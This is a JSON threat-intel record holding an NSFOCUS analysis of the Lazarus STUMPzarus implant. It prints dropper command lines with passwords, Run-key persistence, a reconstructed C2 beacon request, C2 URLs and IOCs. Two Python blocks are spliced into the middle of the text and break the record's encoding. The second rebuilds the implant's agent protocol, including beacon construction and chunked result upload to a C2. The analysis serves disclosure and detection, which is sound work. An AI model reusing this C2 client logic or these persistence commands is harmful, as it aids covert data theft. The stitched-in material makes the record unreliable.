{
	"id": "b54c67c2-ff43-4397-b2cd-6caa8a55ad93",
	"created_at": "2026-04-06T00:15:13.953595Z",
	"updated_at": "2026-04-10T13:12:11.508147Z",
	"deleted_at": null,
	"sha1_hash": "51123e82cb5de63c9bbba25e92276c0a26276a3e",
	"title": "Meet STUMPzarus: an in-depth analysis of a recent targeted-attack component of the Lazarus APT group – NSFOCUS Technical Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1839916,
	"plain_text": "Meet STUMPzarus: an in-depth analysis of a recent targeted-attack component of the Lazarus APT group –\r\nNSFOCUS Technical Blog\r\nPublished: 2021-01-29 · Archived: 2026-04-05 19:21:56 UTC\r\nhttp://blog.nsfocus.net/stumbzarus-apt-lazarus/\r\n1. Background\r\nThis incident was disclosed by Google's Threat Analysis Group. The attackers created several fake security-researcher accounts on Twitter and posted a steady stream of vulnerability write-ups to draw the attention of vulnerability researchers; they also ran a research blog publishing purported 0-day research and analysis. Through this presence they screened for and engaged potential targets. Exploiting researchers' need to follow vulnerability disclosures in real time, the attackers attracted a number of researchers, contacted them by direct message and proposed jointly analysing a supposed 0-day. Once a researcher agreed, the attackers sent a so-called 'PoC': a Visual Studio project with malicious code embedded in it. As soon as the researcher opened the project, the malicious code ran. According to Google, some researchers were also infected merely by visiting the attacker-run blog even though they were running an up-to-date Chrome, which suggests a browser 0-day may have been involved.\r\n2. About the Lazarus Group\r\nLazarus is a North Korean APT group, also known as HIDDEN COBRA (the name APT38 is also applied to its financially motivated subgroup). Its activity dates back to 2009; its main targets are government and enterprise staff in South Korea, East Asia and Southeast Asia. Lazarus has been very active in recent years and has even attacked pharmaceutical companies working on COVID-19. Its usual toolset includes DDoS botnets, keyloggers, remote access tools and spyware.\r\n3. Malware analysis\r\n3.1 Sample relationships\r\nEvery trojan seen in this targeted attack on security researchers is wrapped in two outer layers, following this call chain:\r\n4c3499f3cc4a4fdc7e67417e055891c78540282dccc57e37a01167dfe351b244 –drop–>\r\na75886b016d84c3eaacaf01a3c61e04953a7a3adf38acf77a4a2e3a8f544f855 –drop–>\r\na08d24f74027256c6fd5c5a2fdb15b12889971fbdcfa7a28ffebbfe8b15aaefb\r\nThe final-stage trojan evolved from the DRATzarus trojan that Lazarus has used before; we tentatively name it STUMPzarus.\r\n3.2 Attack stages\r\nThe malware in this incident launches itself through multi-stage dropping. According to the public disclosure, the outermost DLL, 4c3499f3cc4a4fdc7e67417e055891c78540282dccc57e37a01167dfe351b244, was disguised as a database file inside the Visual Studio project; it is a malicious runtime library, and each later stage is carried as a DLL inside the preceding dropper. Every stage requires a password or parameter passed on the command line before it will execute.\r\n3.2.1 Stage 1: 4c3499f3cc4a4fdc7e67417e055891c78540282dccc57e37a01167dfe351b244\r\nThis is a 64-bit DLL; the main code lives in the exported function CMS_dataFinalW.\r\nThe DLL must be launched with the following arguments:\r\nC:\\\\Windows\\\\System32\\\\rundll32.exe [thisfilepath], CMS_dataFinal Bx9yb37GEcJNK6bt [4bytes_prefix]\r\nwhere [4bytes_prefix] varies and is consumed by the later-stage trojan (rundll32 resolves the bare name CMS_dataFinal to the W-suffixed Unicode export).\r\nThe DLL checks whether either of the following processes is running:\r\nname vendor\r\navp.exe Kaspersky\r\navastui.exe Avast\r\nIf neither is found, it writes the following value under the registry Run key SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\:\r\nValueName Value\r\nOneDrive_Update\r\nC:\\\\Windows\\\\System32\\\\rundll32.exe 
C:\\\\ProgramData\\\\VMware\\\\vmnat-update.bin, OCSP_resp_find lxUi5CZ0IV45j89Y [4bytes_prefix]\r\nIt then drops the PE file embedded in it to C:\\\\ProgramData\\\\VMware\\\\vmnat-update.bin and runs that file with the same command line as the registry value. This file is the second-stage dropper.\r\n3.2.2 Stage 2: a75886b016d84c3eaacaf01a3c61e04953a7a3adf38acf77a4a2e3a8f544f855\r\nThis is a 64-bit DLL; the main code lives in the exported function OCSP_resp_findW.\r\nThe DLL must be launched with the following arguments:\r\nC:\\\\Windows\\\\System32\\\\rundll32.exe C:\\\\ProgramData\\\\VMware\\\\vmnat-update.bin, OCSP_resp_find lxUi5CZ0IV45j89Y [4bytes_prefix]\r\nIts code structure mirrors the stage-1 dropper. Its job is to extract and decompress the PE file embedded in it, load that PE into memory and run it, passing [4bytes_prefix] along to it. The module it loads in memory is stage 3.\r\n3.2.3 Stage 3: a08d24f74027256c6fd5c5a2fdb15b12889971fbdcfa7a28ffebbfe8b15aaefb\r\nThis trojan is the principal malicious component of the attack: a loader that fetches remote payloads to carry out data theft and similar tasks. From its communication flow one can infer that it is the foundation module of the whole attack chain and that, together with the payloads it later receives, it forms a system whose main purpose is information collection and theft.\r\nIn both communication flow and code, the trojan shows clear similarities to the DRATzarus RAT disclosed by ClearSky in August 2020 and can be considered an evolution of it. The DRATzarus-related 'Dream Job' campaign has been attributed to the North Korean APT group Lazarus.\r\nBased on the trojan's main function, we tentatively name it STUMPzarus.\r\nFor DRATzarus see https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf\r\n3.3 Parallel attack chains\r\nThe other samples from the attack disclosed by Google form exactly the same drop chain.\r\nDrop chain 1:\r\n68e6b9d71c727545095ea6376940027b61734af5c710b2985a628131e47c6af7 –drop–>\r\n25d8ae4678c37251e7ffbaeddc252ae2530ef23f66e4c856d98ef60f399fa3dc –drop–>\r\ncb0f1aa2a59115d038235bcbfa28f1958bd1caf4189265a3c61974114b402e03\r\nDrop chain 2:\r\n284df008aa2459fd1e69b1b1c54fb64c534fce86d2704c4d4cc95d72e8c11d6f –drop–>\r\n913871432989378a042f5023351c2fa2c2f43b497b75ef2a5fd16d65aa7d0f54 
–drop–>\r\ndcd0d70eb8384d00be9522b121194afff1dd91325bb672a8849afb739f80f58c\r\nThese chains are identical to the one described above and likewise end in the STUMPzarus trojan.\r\nThe three CnC slots carried by the STUMPzarus samples above hold, respectively:\r\nhttps[:]//codevexillium.org/image/download/download.asp\r\nhttps[:]//codevexillium.org/image/download/download.asp\r\nhttps[:]//angeldonationblog.com/image/upload/upload.php\r\nand\r\nhttps[:]//angeldonationblog.com/image/upload/upload.php\r\nhttps[:]//angeldonationblog.com/image/upload/upload.php\r\nhttps[:]//angeldonationblog.com/image/upload/upload.php\r\n3.4 Communication analysis\r\n3.4.1 Basic format\r\n3.4.1.1 Agent request\r\nThe trojan talks to its CnC over HTTPS. Every exchange is initiated by the agent, which sends a POST request in a fixed format; the CnC answers the request with data. A reconstructed agent POST looks like this:\r\nPOST /image/download/download.asp HTTP/1.0\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)\r\nHost: codevexillium.org\r\nContent-Type: application/x-www-form-urlencoded\r\nConnection: Keep-Alive\r\n\r\nPW=GQWLXM&DTUXG=YWJjZFpUd3dPYzBoQ05iTg==&HDFV=&XPTERQ=0&EVYNQM=52&JQRMAQ=MgAwADIAMQAtADAAMQAtADIANwAgADEANQA6ADEAOAA6ADMAOQA=&BBYXCYGNER=LBBONCVIQHJUYC&RXBVB=QOZUYRDUX\r\nThe body carries several parameters; their names, values and meaning are:\r\nNo. | Parameter name | Name length | Parameter value | Value length\r\n1 | random uppercase letters | 2 bytes | random uppercase letters; the length of this value is the packetcode | variable\r\n2 | random uppercase letters | 5 bytes | base64-encoded sID | 24 bytes\r\n3 | random uppercase letters | 4 bytes | base64-encoded extra data A | variable\r\n4 | random uppercase letters | 6 bytes | packet type mark (packetmark) | 1 byte\r\n5 | random uppercase letters | 6 bytes | length of (encoded) extra data B | usually 2 bytes\r\n6 | random uppercase letters | 6 bytes | base64-encoded extra data B | variable\r\n7 to 9 (count varies) | random uppercase letters | variable | meaningless random values | variable\r\nThe length of parameter 1's value is the packetcode, which the trojan uses to signal its current communication state (6 in the sample above).\r\nParameter 2 carries the sID: the [4bytes_prefix] given on the command line followed by 12 random characters (the sample decodes to the prefix abcd followed by ZTwwOc0hCNbN).\r\nParameter 3 is not actually used by the trojan.\r\nParameter 4 carries the packet type mark (packetmark); in some exchanges the trojan uses it to tell the CnC whether a transfer is complete.\r\nParameter 5 holds the length of parameter 6's encoded value (52 in the sample).\r\nParameter 6 may carry a timestamp string, a content length, additional content and so on, separated by '|' (the sample decodes, as UTF-16LE, to the timestamp 2021-01-27 15:18:39).\r\n3.4.1.2 CnC reply\r\nEvery CnC reply is base64-encoded, with each '+' in the encoding replaced by a space.\r\n
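The framing above is concrete enough to check against a captured request. The following Python is an added example, not code from the original post or from the malware: it parses an agent POST body exactly as the table describes (fields identified by position, packetcode taken from the length of the first value, sID split into prefix and random suffix, the length declared in field 5 checked against field 6) and undoes the CnC reply transform (space back to '+', then base64, then the leading wide character). The sample body is the one shown above; the sample reply bytes in the encoder are constructed for illustration, and the EC layer is not modelled.

```python
import base64

# Constructed sample: the agent POST body reproduced from the write-up above.
SAMPLE_BODY = ('PW=GQWLXM&DTUXG=YWJjZFpUd3dPYzBoQ05iTg==&HDFV=&XPTERQ=0'
               '&EVYNQM=52&JQRMAQ=MgAwADIAMQAtADAAMQAtADIANwAgADEANQA6ADEAOAA6ADMAOQA='
               '&BBYXCYGNER=LBBONCVIQHJUYC&RXBVB=QOZUYRDUX')

# packetcode (length of the first value) per communication form
PACKETCODES = {6: 'check-in', 10: 'keep-alive/params', 7: 'payload', 11: 'error', 12: 'result'}


def _text_or_raw(raw):
    # Extra data B is UTF-16LE text with '|' separators when it is plaintext;
    # in the result-upload form it is EC-encrypted, so fall back to raw bytes.
    try:
        return raw.decode('utf-16-le').split('|')
    except UnicodeDecodeError:
        return raw


def parse_agent_request(body):
    # Field names are random uppercase letters, so fields are identified by
    # position; the documented name lengths (2,5,4,6,6,6) are a sanity check.
    pairs = [p.split('=', 1) for p in body.split('&')]
    if len(pairs) < 6 or any(len(p) != 2 for p in pairs) or [len(k) for k, _ in pairs[:6]] != [2, 5, 4, 6, 6, 6]:
        raise ValueError('body does not match the STUMPzarus field layout')
    code, sid, extra_a, mark, blen, extra_b = [v for _, v in pairs[:6]]
    if not blen.isdigit() or len(extra_b) != int(blen):
        raise ValueError('declared length of field 6 does not match its value')
    sid_raw = base64.b64decode(sid)
    if len(sid_raw) != 16:
        raise ValueError('sID must be the 4-byte prefix plus 12 random chars')
    return {
        'packetcode': len(code),
        'state': PACKETCODES.get(len(code), 'unknown'),
        'sid_prefix': sid_raw[:4].decode('ascii'),
        'sid_random': sid_raw[4:].decode('ascii'),
        'extra_a': base64.b64decode(extra_a),
        'packetmark': int(mark),
        'extra_b': _text_or_raw(base64.b64decode(extra_b)),
        'junk_fields': len(pairs) - 6,
    }


def decode_cnc_reply(text):
    # The CnC base64-encodes every reply and replaces '+' with a space;
    # undo that and split off the leading wide character (L'0' or L'1').
    raw = base64.b64decode(text.replace(' ', '+'))
    return raw[:2].decode('utf-16-le'), raw[2:]


def encode_cnc_reply(head, payload):
    # Mirror of the CnC side, constructed here to produce test replies.
    return base64.b64encode(head.encode('utf-16-le') + payload).decode('ascii').replace('+', ' ')
```

Run against a proxy log or PCAP extraction, parse_agent_request gives a quick triage signal: a body whose first six field names have exactly these lengths, whose second value decodes to 16 bytes and whose fifth value equals the length of the sixth is a strong match for this framing regardless of the random names. The length check on field 5 matters because the sample's value 52 is the length of the base64 string, not of the decoded 38-byte timestamp.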
3.4.1.2.1 Communication forms\r\nFrom the trojan's logic, communication takes the following forms:\r\nCheck-in & key delivery:\r\nOccurs when the agent first contacts the CnC.\r\nThe CnC sends the agent a point used to initialise the elliptic-curve public key; all subsequent encrypted traffic is built on that curve.\r\nAgent: sends a type-A request with packetcode 6 and packetmark 0;\r\nCnC: replies with a base64-encoded packet.\r\nNormally the CnC packet begins with the wide character L”0”; the agent keeps the rest of the packet as the curve point and initialises the public key from it. The trojan uses the secp521r1 curve.\r\nThe agent's elliptic-curve private key is a randomly generated string of 0x20 uppercase letters (note that such a string carries far less entropy than a full secp521r1 scalar).\r\nKeep-alive & parameter delivery:\r\nOccurs after the agent has received the public key.\r\nThe agent keeps sending POST requests to hold the session open while waiting for the CnC to deliver an encrypted parameter string.\r\nAgent: sends a type-B request with packetcode 10 and packetmark 0;\r\nCnC: replies with an EC-encrypted, base64-encoded packet.\r\nWhile the CnC packet begins with L”1”, the agent keeps sending type-B requests to keep the connection alive.\r\nWhen the packet begins with any character other than L”1”, the remainder holds five '|'-separated parameters:\r\nParam 1: new communication capacity\r\nParam 2: length of the next-stage payload file\r\nParam 3: marker string identifying the payload's entry function\r\nParam 4: argument for the payload's entry function\r\nParam 5: data verification hash\r\nThe capacity in param 1 limits how much content the agent may append to a request body.\r\nPayload delivery:\r\nOccurs after the agent has received the parameter string.\r\nThe agent sends a specific POST; the CnC replies with an encrypted PE file as the attack payload.\r\nAgent: sends a type-C request with packetcode 7 and packetmark 0;\r\nCnC: replies with an EC-encrypted, base64-encoded packet containing the PE file.\r\nThe agent then verifies the decrypted PE against the hash in param 5. That hash is derived from the MD5 of the file by a transcoding step (shown in the original as a figure that is not reproduced here).\r\nOnce every exchange has completed correctly and the hash check passes, the agent loads the PE delivered by the CnC and calls its entry function.\r\nPayload communication:\r\nOccurs after the agent has executed the payload delivered by the CnC.\r\nThe agent reads the result produced by the payload and sends it to the CnC.\r\nAgent: sends a type-E request with packetcode 12 and packetmark 2 or 3;\r\nCnC: replies with a base64-encoded packet.\r\nIn this exchange the agent carries the EC-encrypted result of the payload function in parameter 6 of the request body, and the packetmark in parameter 4 tells the CnC whether the transfer is complete:\r\npacketmark meaning\r\n2 data not yet fully sent\r\n3 data fully sent\r\nIf the CnC reply begins with L”0”, the agent resets the communication flow and sleeps for 1200 seconds;\r\nif it begins with anything other than L”0”, the agent returns to keep-alive & parameter delivery mode.\r\nFrom this flow one can infer that the trojan is chiefly an espionage implant for information collection.\r\nError report:\r\nOccurs when the agent finds an error in the CnC reply at any of the stages above.\r\nAgent: sends a type-D request with packetcode 11 and packetmark 0;\r\nCnC: replies with a base64-encoded packet.\r\nIf the reply begins with L”0”, the agent continues; otherwise it closes its network handle.\r\nSummary\r\nThe communication logic shows that STUMPzarus builds a complete encrypted channel to its CnC; an attack component delivered by the CnC only needs to implement its own function and hand the result back to STUMPzarus. That is why we call it a stump.\r\n
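The five exchanges above form a small state machine, and the clearest way to see how packetcode, packetmark and the reply head drive it is to run both sides. The Python below is an added example, not code from the original post or from the malware: an agent walks check-in, keep-alive, parameter delivery, payload delivery, result upload (chunked to the capacity from param 1, packetmark 2 then 3) and the error report against a scripted stand-in for the CnC. Assumptions, not facts from the write-up: the EC layer is omitted (replies are plaintext inside the base64 framing), reply bodies are UTF-16LE text like their leading wide character, the hash in param 5 is compared as a plain hex MD5 (the real agent applies a transcoding step the write-up only shows as a figure), and run_payload and ScriptedCnC are stand-ins for loading the PE and for the real server.

```python
import base64
import hashlib
import random
import string


def _upper(n, rng):
    return ''.join(rng.choice(string.ascii_uppercase) for _ in range(n))


def build_agent_request(packetcode, sid, packetmark, extra_b, rng):
    # Body layout from the write-up: six positional fields with random
    # uppercase names of length 2,5,4,6,6,6, followed by 1-3 junk fields.
    # The length of the first value is the packetcode.
    enc_b = base64.b64encode(extra_b).decode('ascii')
    fields = [
        (_upper(2, rng), _upper(packetcode, rng)),
        (_upper(5, rng), base64.b64encode(sid.encode('ascii')).decode('ascii')),
        (_upper(4, rng), ''),                 # extra data A: unused by the trojan
        (_upper(6, rng), str(packetmark)),
        (_upper(6, rng), str(len(enc_b))),    # length of the encoded field 6
        (_upper(6, rng), enc_b),
    ]
    for _ in range(rng.randint(1, 3)):
        fields.append((_upper(rng.randint(5, 10), rng), _upper(rng.randint(5, 14), rng)))
    return '&'.join(k + '=' + v for k, v in fields)


def _reply(head, payload):
    # CnC framing: leading wide char, base64, '+' replaced by a space.
    return base64.b64encode(head.encode('utf-16-le') + payload).decode('ascii').replace('+', ' ')


def decode_reply(text):
    raw = base64.b64decode(text.replace(' ', '+'))
    return raw[:2].decode('utf-16-le'), raw[2:]


class ScriptedCnC:
    # Constructed stand-in for the server; plaintext where the real one uses EC.
    def __init__(self, payload, capacity=40, tamper=False):
        self.payload, self.capacity, self.tamper = payload, capacity, tamper
        self.keepalives, self.chunks = 0, []

    def handle(self, body):
        fields = [f.split('=', 1) for f in body.split('&')]
        code = len(fields[0][1])
        if code == 6:                              # check-in: deliver the curve point
            return _reply('0', b'constructed-curve-point')
        if code == 10:                             # keep-alive until params are ready
            self.keepalives += 1
            if self.keepalives < 3:
                return _reply('1', b'')
            md5 = hashlib.md5(self.payload).hexdigest()
            params = '|'.join([str(self.capacity), str(len(self.payload)), 'entry', 'arg', md5])
            return _reply('2', params.encode('utf-16-le'))
        if code == 7:                              # payload delivery
            pe = self.payload[:-1] + b'x' if self.tamper else self.payload
            return _reply('2', pe)
        if code == 12:                             # result upload: mark 2 = more, 3 = done
            self.chunks.append(base64.b64decode(fields[5][1]))
            return _reply('1' if fields[3][1] == '2' else '0', b'')
        return _reply('0', b'')                    # error report: tell the agent to carry on


def run_payload(pe, entry, arg):
    # Stand-in for loading the PE and calling its entry function.
    return (entry + ':' + arg + ':' + pe.hex()).encode('ascii')


def run_agent(cnc, prefix, seed=1):
    rng = random.Random(seed)
    sid = prefix + _upper(12, rng)                 # 4-byte prefix + 12 random chars
    trace = []

    def send(code, mark, data=b''):
        head, body = decode_reply(cnc.handle(build_agent_request(code, sid, mark, data, rng)))
        trace.append((code, mark, head))
        return head, body

    head, _point = send(6, 0)                      # A: check-in & key delivery
    if head != '0':
        return trace, 'check-in-failed'
    head, body = send(10, 0)                       # B: keep-alive & parameter delivery
    while head == '1':
        head, body = send(10, 0)
    cap, plen, entry, arg, want = body.decode('utf-16-le').split('|')
    head, pe = send(7, 0)                          # C: payload delivery
    # Assumption: plain hex MD5; the real agent transcodes the MD5 first.
    if len(pe) != int(plen) or hashlib.md5(pe).hexdigest() != want:
        send(11, 0)                                # D: error report
        return trace, 'hash-mismatch'
    result = run_payload(pe, entry, arg)
    cap = int(cap)                                 # capacity bounds the content per request
    chunks = [result[i:i + cap] for i in range(0, len(result), cap)]
    for i, chunk in enumerate(chunks):             # E: result upload
        head, _ = send(12, 3 if i == len(chunks) - 1 else 2, chunk)
    return trace, 'sleep-1200s' if head == '0' else 'keep-alive'
```

The trace returned by run_agent is the sequence an analyst should expect to see on the wire: one packetcode-6 request, a run of packetcode-10 requests until the reply head changes from L”1”, one packetcode-7 request, then packetcode-12 requests with packetmark 2 until the last chunk carries packetmark 3. Serving a tampered payload makes the hash check fail and the agent emit a single packetcode-11 request, which is the error-report form.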
4. Attribution\r\n4.1 Correlation analysis\r\nThe STUMPzarus trojan from this incident and the confirmed Lazarus tool DRATzarus share a great deal at the code and logic level, including:\r\nidentical logic for generating the POST body string (figure not reproduced);\r\nsimilar post-processing of the base64-encoded CnC reply (figure not reproduced);\r\na password passed on the command line as the condition for execution (figure not reproduced);\r\nan identical PE-loading function implementation (figure not reproduced).\r\nBeyond these, the two tools share a lot of other code, including an identical RC4 implementation and similar logic for judging CnC replies.\r\nFrom these similarities we infer that STUMPzarus was built by modifying the DRATzarus code base, compiling in the OpenSSL library and replacing DRATzarus's original RC4 channel with elliptic-curve encrypted communication, a clear upgrade in transport security.\r\nSTUMPzarus also resembles the Torisma trojan found in the Operation North Star campaign disclosed by McAfee (https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-behind-the-scenes/):\r\na similar random-number-based way of choosing the CnC address (figure not reproduced);\r\na similar CnC URL format:\r\nSTUMPzarus | Torisma\r\nhttps[:]//codevexillium.org/image/download/download.asp | https[:]//www.commodore.com.tr/mobiquo/appExtt/notdefteri/writenote.php\r\nhttps[:]//www.dronerc.it/shop_testbr/upload/upload.php | https[:]//www.scimpex.com/admin/assets/backup/requisition/requisition.php\r\nhttps[:]//transplugin.io/upload/upload.asp | https[:]//www.fabianiarte.com/newsletter/arte/view.asp\r\nTorisma is a spyware implant; its CnC address www.fabianiarte.com ties it to Lazarus's Dream Job campaign.\r\n4.2 Group characteristics\r\nFrom our analysis of STUMPzarus and of Lazarus's earlier attack tools, we see the following traits in the group's recent tooling:\r\nRedundant design\r\nFor the foundation component of an exfiltration system, STUMPzarus's communication logic is clearly over-engineered. The developers layered HTTPS, obfuscation, character substitution, junk parameters and the secp521r1 curve onto the protocol for confidentiality; the trojan steers the conversation with multiple flags, and at least three round trips (key delivery, parameter delivery and payload delivery) are needed before it can obtain an actual payload. APT groups always go to great lengths to stay covert, but much of this design duplicates functionality, and the pieces hardly add up to more than the sum of their parts.\r\nThe same redundancy already appeared in Lazarus's Dream Job campaign. In DRATzarus the developers used HTTPS and RC4 together to encrypt traffic, split the run parameters out into a configuration file embedded in the PE, and added a global flag selecting the run mode: 0x3456 runs in stealth mode, 0x3457 in logging mode, where configuration data is written to a registry key. Such a design is uncommon in APT tool development, where code optimisation usually gets little attention.\r\n
We cannot determine why the Lazarus developers design this way, but the style clearly helps with attribution.\r\nPassword-gated execution\r\nLazarus developers like to gate PE execution on a password passed in the command-line arguments.\r\nEach STUMPzarus dropper stage uses a string such as Bx9yb37GEcJNK6bt or lxUi5CZ0IV45j89Y as its own start-up password, and every dropper in the parallel attack chains sets its own; DRATzarus has the same logic and uses the string 844513479; and the Lazarus component Curiofireza, seen as early as 2019, obtained the password for decrypting the next-stage payload the same way.\r\nGating execution on an argument is a cheap evasion that defeats some sandboxes and automated analysis systems. Perhaps because they rely so heavily on this start-up condition, the Lazarus developers added no conventional environment checks to the trojan.\r\n5. Conclusion\r\nBy analysing the malware from this targeted attack and the related attack tools, we have identified a new APT component and confirmed its close ties to the Lazarus group.\r\nWe observe that the final payloads Lazarus delivers are shifting from purely functional RATs and spyware toward STUMP-style components. This gives the attackers more flexibility and control over what they do on a target, and it reflects the usual iteration of an APT group's attack framework.\r\nAppendix: IOCs\r\nStage-1 droppers\r\n4c3499f3cc4a4fdc7e67417e055891c78540282dccc57e37a01167dfe351b244\r\n68e6b9d71c727545095ea6376940027b61734af5c710b2985a628131e47c6af7\r\n284df008aa2459fd1e69b1b1c54fb64c534fce86d2704c4d4cc95d72e8c11d6f\r\nStage-2 droppers\r\na75886b016d84c3eaacaf01a3c61e04953a7a3adf38acf77a4a2e3a8f544f855\r\n25d8ae4678c37251e7ffbaeddc252ae2530ef23f66e4c856d98ef60f399fa3dc\r\n913871432989378a042f5023351c2fa2c2f43b497b75ef2a5fd16d65aa7d0f54\r\nSTUMPzarus\r\na08d24f74027256c6fd5c5a2fdb15b12889971fbdcfa7a28ffebbfe8b15aaefb\r\ncb0f1aa2a59115d038235bcbfa28f1958bd1caf4189265a3c61974114b402e03\r\ndcd0d70eb8384d00be9522b121194afff1dd91325bb672a8849afb739f80f58c\r\nCnC\r\nhttps[:]//codevexillium.org/image/download/download.asp\r\n
https[:]//www.dronerc.it/shop_testbr/upload/upload.php\r\nhttps[:]//transplugin.io/upload/upload.asp\r\nhttps[:]//angeldonationblog.com/image/upload/upload.php\r\nOther IoCs from Google:\r\nBlog\r\nhttps://blog.br0vvnn[.]io\r\nTwitter accounts\r\nhttps://twitter.com/br0vvnn\r\nhttps://twitter.com/BrownSec3Labs\r\nhttps://twitter.com/dev0exp\r\nhttps://twitter.com/djokovic808\r\nhttps://twitter.com/henya290\r\nhttps://twitter.com/james0x40\r\nhttps://twitter.com/m5t0r\r\nhttps://twitter.com/mvp4p3r\r\nhttps://twitter.com/tjrim91\r\nhttps://twitter.com/z0x55g\r\nTelegram\r\nhttps://t.me/james50d\r\nKeybase\r\nhttps://keybase.io/zhangguo\r\nRelated sample hash\r\na4fb20b15efd72f983f0fb3325c0352d8a266a69bb5f6ca2eba0556c3e00bd15\r\nC&C domains\r\nangeldonationblog[.]com\r\ncodevexillium[.]org\r\ninvestbooking[.]de\r\nkrakenfolio[.]com\r\nopsonew3org[.]sg\r\ntransferwiser[.]io\r\ntransplugin[.]io\r\nC&C URLs\r\nhttps[:]//investbooking[.]de/upload/upload.asp\r\nhttps[:]//www.dronerc[.]it/forum/uploads/index.php\r\nhttps[:]//www.dronerc[.]it/shop_testbr/upload/upload.php\r\nhttps[:]//www.edujikim[.]com/intro/blue/insert.asp\r\nhttps[:]//www.fabioluciani[.]com/es/include/include.asp\r\nhttp[:]//trophylab[.]com/notice/images/renewal/upload.asp\r\nhttp[:]//www.colasprint[.]com/_vti_log/upload.asp\r\nAppendix: references\r\nhttps://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/\r\nhttps://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf\r\nhttps://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-behind-the-scenes/\r\nAbout Fuying Lab\r\nFuying Lab (伏影实验室) focuses on security threat monitoring and counter-measure research. Its research targets include botnets, APT advanced threats, DDoS defence, web defence, exploitation threats against popular service systems, identity and authentication threats, digital asset threats, cybercrime threats and emerging threats. By tracking live threats it identifies risk, mitigates damage and supports decision-making in threat response.\r\nSource: http://blog.nsfocus.net/stumbzarus-apt-lazarus/",
	"extraction_quality": 1,
	"language": "ZH",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"http://blog.nsfocus.net/stumbzarus-apt-lazarus/"
	],
	"report_names": [
		"stumbzarus-apt-lazarus"
	],
	"threat_actors": [
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f426f0a0-faef-4c0e-bcf8-88974116c9d0",
			"created_at": "2022-10-25T15:50:23.240383Z",
			"updated_at": "2026-04-10T02:00:05.299433Z",
			"deleted_at": null,
			"main_name": "APT38",
